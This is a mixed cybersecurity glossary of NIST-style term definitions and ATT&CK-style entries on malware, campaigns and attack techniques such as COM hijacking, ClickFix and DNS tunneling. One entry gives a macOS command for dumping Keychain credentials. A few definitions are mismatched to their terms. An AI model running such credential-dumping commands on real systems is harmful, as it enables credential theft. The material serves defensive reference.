Definition: An interval estimate [low, high] of a population parameter. If the population is repeatedly sampled, and confidence intervals are computed for each sample with significance level α, approximately 100(1− α) % of the intervals are expected to contain the true population parameter.

Name: 2022 Ukraine Electric Power Attack
Type: campaign
Description: The 2022 Ukraine Electric Power Attack was a Sandworm Team campaign that used a combination of GOGETTER, Neo-REGEORG, CaddyWiper, and living of the land (LotL) techniques to gain access to a Ukrainian electric utility to send unauthorized commands from their SCADA system.

Term: Unbiased
Definition: A value that is chosen from a sample space is said to be unbiased if all potential values have the same probability of being chosen. Contrast with biased.

Name: Bad Rabbit
Type: malware
Description: Bad Rabbit is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. Bad Rabbit has also targeted organizations and consumers in Russia.

Term: Stateless
Definition: Refers to a data representation or a process that is self-contained and does not depend on any external data store.

Name: DarkGate
Type: malware
Description: DarkGate first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, DarkGate is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions. DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.

Name: PowerDuke
Type: malware
Description: PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros.

Term: Secure Sockets Layer (SSL)
Definition: Provides privacy and reliability between two communicating applications. It is designed to encapsulate other protocols, such as HTTP. SSL v3.0 was released in 1996. It has been succeeded by IETF's TLS.

Name: Hacking Team UEFI Rootkit
Type: malware
Description: Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software.

Term: IA
Definition: Measures that protect and defend information and information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. These measures include providing for restoration of information systems by incorporating protection, detection, and reaction capabilities.

Term: PS
Definition: The discipline of assessing the conduct, integrity, judgment, loyalty, reliability, and stability of individuals for duties and responsibilities requiring trustworthiness.

Name: CDNs
Type: attack-pattern
Description: Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Drive-by Compromise).

Term: Simple Object Access Protocol
Definition: An XML-based protocol for exchanging structured information in a decentralized, distributed environment.

Term: Security Control Item
Definition: All or part of a SP 800-53 security control requirement, expressed as a statement for implementation and assessment. Both controls and control enhancements are treated as control items. Controls and control enhancements are further subdivided if multiple security requirements within the control or control enhancement in SP 800-53 are in listed format: a, b, c, etc.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants so that neither party can predetermine the value of the secret keying material independent of the contributions of the other party. Contrast with key transport.

Term: Tier II Checklist
Definition: A checklist in the National Checklist Repository that documents the recommended security settings in a machine-readable but non-standard format, such as a proprietary format or a product-specific configuration script.

Name: Communication Through Removable Media
Type: attack-pattern
Description: Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

Term: system life cycle
Definition: The period of time that begins when a system is conceived and ends when the system is no longer available for use.
Refer to life cycle stages.

Term: SOAP
Definition: An XML-based protocol for exchanging structured information in a decentralized, distributed environment.

Term: Key Management System
Definition: A system for the management of cryptographic keys and their metadata (e.g., generation, distribution, storage, backup, archive, recovery, use, revocation, and destruction). An automated key management system may be used to oversee, automate, and secure the key management process.

Name: Exfiltration Over Bluetooth
Type: attack-pattern
Description: Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Term: Controller
Definition: A functional exercise staff member who monitors, manages, and controls exercise activity to meet established objectives.

Term: cSHAKE
Definition: The customizable SHAKE function.

Term: Key wrapping
Definition: A method of providing both confidentiality and integrity protection for keying material using a symmetric key,

Term: I2BS
Definition: Integer to Byte String conversion routine.

Term: spyware
Definition: Software that is secretly or surreptitiously installed onto an information system to gather information on individuals or organizations without their knowledge; a type of malicious code.

Term: Trust Framework Operators
Definition: See Federation Administrators.

Term: Local Remediation Level
Definition: measures the level of protection against a misuse vulnerability within the local IT environment and captures both how widespread mitigation implementation is and how effective such mitigation is.

Term: <em>X⊕Y</em>
Definition: Bitwise exclusive-or (also bitwise addition modulo 2) of two bitstrings
X and Y of the same length.

Term: privacy domain
Definition: A domain that implements a privacy policy.

Term: Initialization Vector (IV)
Definition: A bit string that is used as an initial value in computing the first iteration of the PRF in feedback mode. It may be an empty string.

Term: Identity Service Provider (ISP)
Definition: A trusted entity that issues or registers subscriber authenticators and issues electronic credentials to subscribers. A CSP may be an independent third party or issue credentials for its own use.

Term: DPC
Definition: A credential&nbsp;issued based on proof of possession and control of a PIV Card. Derived&nbsp;PIV credentials are typically used in situations that do not easily accommodate a PIV&nbsp;Card, such&nbsp;as&nbsp;in&nbsp;conjunction&nbsp;with&nbsp;mobile&nbsp;devices.

Term: cyber resiliency engineering practice
Definition: A method, process, modeling technique, or analytic technique used to identify and analyze cyber resiliency solutions.

Term: <em>padding</em>
Definition: A string consisting of a single “1” bit, followed by zero or more “0” bits.

Term: Entropy
Definition: The amount of uncertainty that an attacker faces to determine the value of a secret. Entropy is usually stated in bits. A value with n bits of entropy has the same degree of uncertainty as a uniformly distributed n-bit random value.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, enterprise, or other entity. 
Note: From a security perspective, a trustworthy system is a system that meets specific security requirements in addition to meeting other critical requirements.

Term: <em>Destruction</em>
Definition: The process of overwriting, erasing, or physically destroying information (e.g., a cryptographic key) so that it cannot be recovered. See NIST SP 800-88.

Term: attacker
Definition: A party who acts with malicious intent to compromise an information system.

Name: Component Object Model Hijacking
Type: attack-pattern
Description: Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry. 

Adversaries may use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. 

One variation of COM hijacking involves abusing Type Libraries (TypeLibs), which provide metadata about COM objects, such as their interfaces and methods. Adversaries may modify Registry keys associated with TypeLibs to redirect legitimate COM object functionality to malicious scripts or payloads. Unlike traditional COM hijacking, which commonly uses local DLLs, this variation may leverage the "script:" moniker to execute remote scripts hosted on external servers. This approach enables stealthy execution of code while maintaining persistence, as the remote payload would be automatically downloaded whenever the hijacked COM object is accessed.

Name: Drive-by Target
Type: attack-pattern
Description: Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).

Adversaries may upload or inject malicious web content, such as JavaScript, into websites. This may be done in a number of ways, including:

* Inserting malicious scripts into web pages or other user controllable web content such as forum posts
* Modifying script files served to websites from publicly writeable cloud storage buckets
* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., Malvertising)

In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in Gather Victim Host Information) to ensure it is vulnerable prior to attempting exploitation.

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure (Domains) to help facilitate Drive-by Compromise.

Term: anonymity
Definition: condition in identification whereby an entity can be recognized as distinct, without sufficient identity information to establish a link to a known identity

Term: CKMS product
Definition: An implementation of a CKMS design produced by a vendor that conforms to the requirements of [NIST SP 800-130], provides a set of key-management services and cryptographic functions, and operates in accordance with the CKMS designer’s CKMS Security Policy.

Term: key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation or signature verification. For the purposes of this document, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1. 
See also Asymmetric keys, Symmetric key.

Term: exclusive-OR
Definition: Exclusive-OR.

Term: facilitated self-assessment
Definition: Less formal than an internal assessment engagement, the element judgments determined by participant consensus on each element for a given level.

Term: PKI
Definition: A support service to the PIV system that provides the cryptographic keys needed to perform digital signature-based identity verification and to protect communications and storage of enterprise data.

Term: Official CPE Dictionary
Definition: The authoritative repository of identifier names, which is hosted by NIST.

Term: shared secret key
Definition: A shared secret that can be used directly as keying material or as a symmetric key.

Name: Keychain
Type: attack-pattern
Description: Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. 

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.

Adversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain –d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.

Term: Key-derivation function
Definition: A function that, with the input of a cryptographic key and other data, generates a bit string called the keying material, as defined in this Recommendation.

Term: <em>[a, b]</em>
Definition: The set of integers x, such that a ≤ x ≤ b.

Term: encipher
Definition: See encrypt. 
Rationale: Deprecated Term: Encrypt is the preferred term.

Name: UPSTYLE
Type: malware
Description: UPSTYLE is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. UPSTYLE has only been observed in relation to this exploitation activity, which involved attempted install on compromised devices by the threat actor UTA0218.

Term: CIO
Definition: Agency official responsible for:
(i) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency;
(ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and
(iii) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.
Note: Organizations subordinate to federal agencies may use the term Chief Information Officer to denote individuals filling positions with similar security responsibilities to agency-level Chief Information Officers.

Term: artificial intelligence model
Definition: A component of an information system that implements AI technology and uses computational, statistical, or machine-learning techniques to produce outputs from a given set of inputs.

Term: black box testing
Definition: A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object. Also known as black box testing.

Name: Code Repositories
Type: attack-pattern
Description: Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or Unsecured Credentials contained within software's source code. Having access to software's source code may allow adversaries to develop Exploits, while credentials may provide access to additional resources using Valid Accounts.

**Note:** This is distinct from Code Repositories, which focuses on conducting Reconnaissance via public code repositories.

Term: Associated Data
Definition: Data that is authenticated but not encrypted.

Term: model privacy attacks
Definition: An attack against machine learning models to extract sensitive in­formation about the model.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: Key Bundle
Definition: The three DEA cryptographic keys (Key1, Key2, Key3) that are used with a TDEA mode.

Term: MINEX
Definition: Minutia Exchange – the NIST program supporting minutia-based biometrics

Name: TRAILBLAZE
Type: malware
Description: TRAILBLAZE is an in-memory dropper used to deploy the passive backdoor BRUSHFIRE. First reported in March 2025, TRAILBLAZE has been observed in operations attributed to People's Republic of China (PRC) state-sponsored affiliated actors, including UNC5221 and SYLVANITE.

Term: VRF
Definition: See “Identity Verification”.

Term: unique identifier (UID)
Definition: A numeric or alphanumeric string that is exclusively associated with a single entity.

Term: data privacy attacks
Definition: Attacks against machine learning models that extract sensitive infor­mation about training data.

Term: basic testing
Definition: A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object. Also known as black box testing.

Term: Observable
Definition: An event (benign or malicious) on a network or system.

Term: architecture
Definition: the design of the network of the hotel environment and the components that are used to construct it

Term: Basic Input/Output System (BIOS)
Definition: In this publication, refers collectively to boot firmware based on the conventional BIOS, Extensible Firmware Interface (EFI), and the Unified Extensible Firmware Interface (UEFI).

Term: security control assessment
Definition: See Security Control Assessment.

Term: Training
Definition: Instruction or learning activity to enhance the employee’s capacity to perform specific job functions and tasks by focusing on skills, concepts, knowledge, and attitudes related to performing a job. It is designed to change what employees know and how they work.

Term: counting query
Definition: A query that counts the number of rows in a dataset with a particular property.

Term: bug bounty
Definition: A method of compensating individuals for reporting software errors, flaws, or faults (“bugs”) that might allow for security exploitation or vulnerabilities.

Term: Ad Hoc HIEs
Definition: An Ad Hoc HIE occurs when two healthcare organizations exchange health information, usually under the precondition of familiarity and trust, using existing and usual office infrastructure such as mail, fax, e-mail and phone calls.

Term: Manage Boundaries
Definition: An ISCM capability that addresses the following network and physical boundary areas: 
Physical Boundaries – Ensure that movement (of people, media, equipment, etc.) into and out of the physical facility does not compromise security. 
Filters – Ensure that traffic into and out of the network (and thus out of the physical facility protection) does not compromise security. Do the same for enclaves that subdivide the network. 
Other – Ensure that information is protected (with adequate strength) when needed to protect confidentiality and integrity, whether that information is in transit or at rest.

Term: stakeholder
Definition: Individual or organization having a right, share, claim, or interest in a system or in its possession of characteristics that meet their needs and expectations.

Term: DSA
Definition: the digital signature algorithm specified in FIPS PUB 186.

Term: subsystem
Definition: A major subdivision or element of an information system consisting of information, information technology, and personnel that performs one or more specific functions.

Term: system prompt
Definition: Application-specific instructions provided in-context to a GenAI system by the model developer or application designer. System prompts are typically prepended to other input, and may be higher-trust than other forms of input.

Name: Clear Persistence
Type: attack-pattern
Description: Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, Modify Registry, Plist File Modification, or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence. Adversaries may also delete accounts previously created to maintain persistence (i.e. Create Account).

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.

Term: non-repudiation
Definition: The capability to protect against an individual falsely denying having performed a particular transaction.

Term: sensitivity
Definition: A form of bias that results from failures in the heuristics humans use to make decisions.

Term: Internal State
Definition: The collection of stored information about a DRBG instantiation. This can include both secret and non-secret information. Compare to working state.

Term: <em>n</em>
Definition: The number of blocks in the formatted message.

Term: WAP
Definition: A standard that defines the way in which Internet communications and other advanced services are provided on wireless mobile devices.

Term: NC
Definition: A time-varying value that has at most a negligible chance of repeating, e.g., a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: V
Definition: Another party in a key-establishment scheme.

Term: NSS
Definition: Any information system (including any telecommunications system) used or operated by an agency or by a contractor of an agency, or other organization on behalf of an agency— (i) the function, operation, or use of which involves intelligence activities; involves cryptologic activities related to national security; involves command and control of military forces; involves equipment that is an integral part of a weapon or weapons system; or is critical to the direct fulfillment of military or intelligence missions (excluding a system that is to be used for routine administrative and business applications, for example, payroll, finance, logistics, and personnel management applications); or (ii) is protected at all times by procedures established for information that have been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: Key-derivation function
Definition: Key Derivation Function.

Name: Remote Access Hardware
Type: attack-pattern
Description: An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment. 

Remote access hardware may be physically installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote session with the target system. Using hardware-based remote access tools may allow threat actors to bypass software security solutions and gain more control over the compromised device(s).

Name: Logon Script (Windows)
Type: attack-pattern
Description: Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system. This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems. See Security Category.

Term: approved
Definition: An algorithm or technique for a specific cryptographic use that is specified in a FIPS or NIST Recommendation, adopted in a FIPS or NIST Recommendation, or specified in a list of NIST-approved security functions.

Term: attribute validation
Definition: An activity that measures that a stakeholder's true needs and expectations are met.

Name: Malicious Copy and Paste
Type: attack-pattern
Description: An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.

Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.

Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.

Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines the specific operation of that algorithm.

Name: Spearphishing Service
Type: attack-pattern
Description: Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: Social Media or Search Victim-Owned Websites) to craft persuasive and believable lures.

Term: TDEA
Definition: The algorithm specified in FIPS PUB 46-3 –1999, Data Encryption Algorithm.

Term: Information System Administrator
Definition: Individual who implements approved secure baseline configurations, incorporates secure configuration settings for IT products, and conducts/assists with configuration monitoring activities as needed.

Term: Key derivation
Definition: 2. A process that derives new keying material from a key (i.e., a key-derivation key) that is currently available.

Term: False Positive
Definition: Incorrectly classifying benign activity as malicious.

Term: linking attack
Definition: An approach for exposing information specific to individuals in a de‐identified dataset by matching up records with a second dataset.

Term: Sources Sought Notice
Definition: A synopsis posted by a government agency that states they are seeking possible sources for a project. It is not a solicitation for work, nor is it a request for proposal.

Name: Network Device Firewall
Type: attack-pattern
Description: Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. 

Adversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.

Adversaries may obtain access to network device management interfaces via Valid Accounts or by exploiting vulnerabilities. In some cases, threat actors may target firewalls and other network infrastructure that are exposed to the internet by leveraging weaknesses in public-facing applications (Exploit Public-Facing Application).

Adversaries may also modify host networking configurations that indirectly manipulate system firewalls, such as adjusting interface bandwidth or network connection request thresholds.

Name: Explosive
Type: malware
Description: Explosive is a custom-made remote access tool used by the group Volatile Cedar. It was first identified in the wild in 2015.

Name: Smoke Loader
Type: malware
Description: Smoke Loader is a malicious bot application that can be used to load other malware.
Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins.

Term: firmware
Definition: See hardware and software.

Term: FISSEA
Definition: theFederal Information Systems Security Educator’s Association, an organization whose members come from federal agencies, industry, and academic institutions devoted to improving the IT security awareness and knowledge within the federal government and its related external workforce.

Term: information system component
Definition: An element of a large system, such as an identity card, PIV Issuer, PIV Registrar, card reader, or identity verification support, within the PIV system.

Term: Botnet
Definition: The word “botnet” is formed from the words “robot” and ”network.” Cyber criminals use special Trojan viruses to breach the security of several users’ computers, take control of each computer, and organize all the infected machines into a network of “bots” that the criminal can remotely manage.

Term: AC
Definition: The process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).

Term: Self-dual Key
Definition: A key with the property that when you encrypt twice with this key, the result is the initial input.

Name: Data from Network Shared Drive
Type: attack-pattern
Description: Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Term: Key derivation
Definition: A process that derives keying material from a key or a shared secret.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides a mechanism for verifying origin authentication, data integrity, and signatory non-repudiation.

Term: Test, Training, and Exercise (TT&E) Program Coordinator
Definition: A person who is responsible for developing a TT&E plan and coordinating TT&E events.

Term: black core
Definition: A network environment (point-to-point and multi-point) supporting end-to-end encrypted information at a single classification level; networks within the environment are segmented by network technology with inspection points at the perimeter, boundary, or gateway. Encrypted traffic is routed, switched, or forwarded over an unclassified or untrusted network infrastructure.

Term: SP
Definition: Include proceedings of conferences sponsored by NIST, NIST annual reports, and other special publications appropriate to this grouping such as wall charts, pocket cards, and bibliographies.

Term: Owner
Definition: 1. For an asymmetric key pair, consisting of a private key and a public key, the owner is the entity that is authorized to use the private key associated with a public key, whether that entity generated the key pair itself or a trusted party generated the key pair for the entity.

Term: ID
Definition: An attribute or set of attributes that uniquely describe a subject within a given context.

Term: Orphan block
Definition: Any block that is not in the main chain after a temporary ledger conflict.

Name: Transmitted Data Manipulation
Type: attack-pattern
Description: Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Term: transparency
Definition: A privacy principle (FIPP) that addresses an organization's practices for conveying information regarding policies and practices with respect to PII, and providing clear and accessible notice regarding creation, collection, use, processing, storage, maintenance, dissemination, and disclosure of PII.

Term: Sponge Construction
Definition: The method originally specified in [Cryptographic sponge functions, version 0.1] for defining a function from the following: 1) an underlying function on bit strings of a fixed length, 2) a padding rule, and 3) a rate. Both the input and the output of the resulting function are bit strings that can be arbitrarily long.

Term: Capability, Boundary Management
Definition: An ISCM capability that addresses the following network and physical boundary areas: 
Physical Boundaries – Ensure that movement (of people, media, equipment, etc.) into and out of the physical facility does not compromise security. 
Filters – Ensure that traffic into and out of the network (and thus out of the physical facility protection) does not compromise security. Do the same for enclaves that subdivide the network. 
Other – Ensure that information is protected (with adequate strength) when needed to protect confidentiality and integrity, whether that information is in transit or at rest.

Name: TeamPCP
Type: intrusion-set
Description: TeamPCP is a financially-motivated, cloud-native threat group that has been active since at least September 2025. Initially focused on ransomware and cryptocurrency theft, TeamPCP shifted in early 2026 to systematic, worm-driven credential theft and software supply chain attacks targeting Continuous Integration and Continuous Delivery (CI/CD) workflows. TeamPCP has monetized access through extortion and through partnerships with ransomware actors including Vect and CipherForce.

Term: device onboarder
Definition: The person or a proxy that is performing onboarding.

Term: efficient (cryptographic) algorithm
Definition: An algorithm whose running time is practical for the relevant security strength.

Term: Personal Digital Assistant (PDA)
Definition: A handheld computer that serves as a tool for reading and conveying documents, electronic mail, and other electronic media over a communications link, as well as for organizing personal information, such as a name-and-address database, a to-do list, and an appointment calendar.

Term: CI
Definition: Essential services and related assets that underpin American society and serve as the backbone of the nation's economy, security, and health.

Term: encipher
Definition: Cryptographically transform data to produce cipher text.

Term: nonce
Definition: A time-varying value that has an acceptably small chance of repeating. For example, a nonce is a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: core attributes
Definition: The set of identity attributes that the CSP has determined and documented to be required for identity proofing and to provide services.

Term: MitM
Definition: An attack where the adversary positions himself in between the user and the system so that he can intercept and alter data traveling between them.

Name: DNS
Type: attack-pattern
Description: Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

DNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e. Protocol Tunneling). The commands may be embedded into different DNS records, for example, TXT or A records. DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices. Infrequent communication conceals the malicious DNS traffic with normal DNS traffic.

Term: sanitization
Definition: The removal of information from the storage device such that data recovery using any known technique or analysis is prevented. Sanitization includes the removal of data from the storage device, as well as the removal of all labels, markings, and activity logs. The method of sanitization varies depending upon the storage device in question, and may include degaussing, incineration, shredding, grinding, embossing, etc.

Term: application interconnection
Definition: A logical communications link between two or more applications operated by different organizations or within the same organization but within different authorization boundaries used to exchange information or provide information services (e.g., authentication, logging).

Term: <em>A</em>
Definition: A short, alphanumeric string derived from a user’s public key using a hash function, with additional data to detect errors. Addresses are used to send and receive digital assets.

Term: <em>Mi</em>
Definition: The ith block of the formatted message.

Term: cross domain enabled
Definition: Applications/services that exist on and are capable of interacting across two or more different security domains.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides source authentication, assurance of data integrity, and supports signatory non-repudiation.

Term: Secondary market
Definition: An unofficial, unauthorized, or unintended distribution channel.

Name: Windows Management Instrumentation Event Subscription
Type: attack-pattern
Description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts – using `mofcomp.exe` –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

Term: body of evidence
Definition: The set of data that documents the information system’s adherence to the security controls applied.

Term: application
Definition: A software program hosted by an information system.

Name: Windows Service
Type: attack-pattern
Description: Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

